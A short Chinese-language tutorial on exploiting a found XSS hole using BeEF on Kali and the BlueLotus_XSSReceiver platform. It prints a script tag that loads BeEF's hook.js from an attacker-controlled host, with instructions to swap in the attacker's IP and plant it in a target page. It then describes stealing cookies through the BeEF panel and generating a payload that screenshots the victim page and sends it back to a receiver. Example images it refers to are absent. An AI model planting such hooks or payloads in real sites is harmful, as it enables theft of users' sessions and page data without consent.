前言
经过测试,如果发现了XSS漏洞,那么我们可以结合一些XSS工具来进行利用。常见的XSS利用工具有下面几个:
1.kali下的beef
(1)kali命令行里输入beef-xss,得到一个脚本
<script src="http://127.0.0.1:3000/hook.js"></script>
将127.0.0.1改为kali的ip,之后进行植入
(2)kali命令行里输入beef-xss,得到beef管理网址http://127.0.0.1:3000/ui/panel,访问就可以对刚刚植入代码的机器进行攻击
例如获取cookie:
2.BlueLotus_XSSReceiver搭建的XSS平台
(1)在github搜索BlueLotus_XSSReceiver,下载环境BlueLotus_XSSReceiver-master,放到www目录下,之后安装
(2)安装好之后新建一个js,直接引用模板,此处引用将当前页面生成一张截图的模板screenshot,输入网站路径,点击生成payload
(3)植入代码:
(4)接收面板里可看到数据回显,返回的内容即为base64编码后的截图
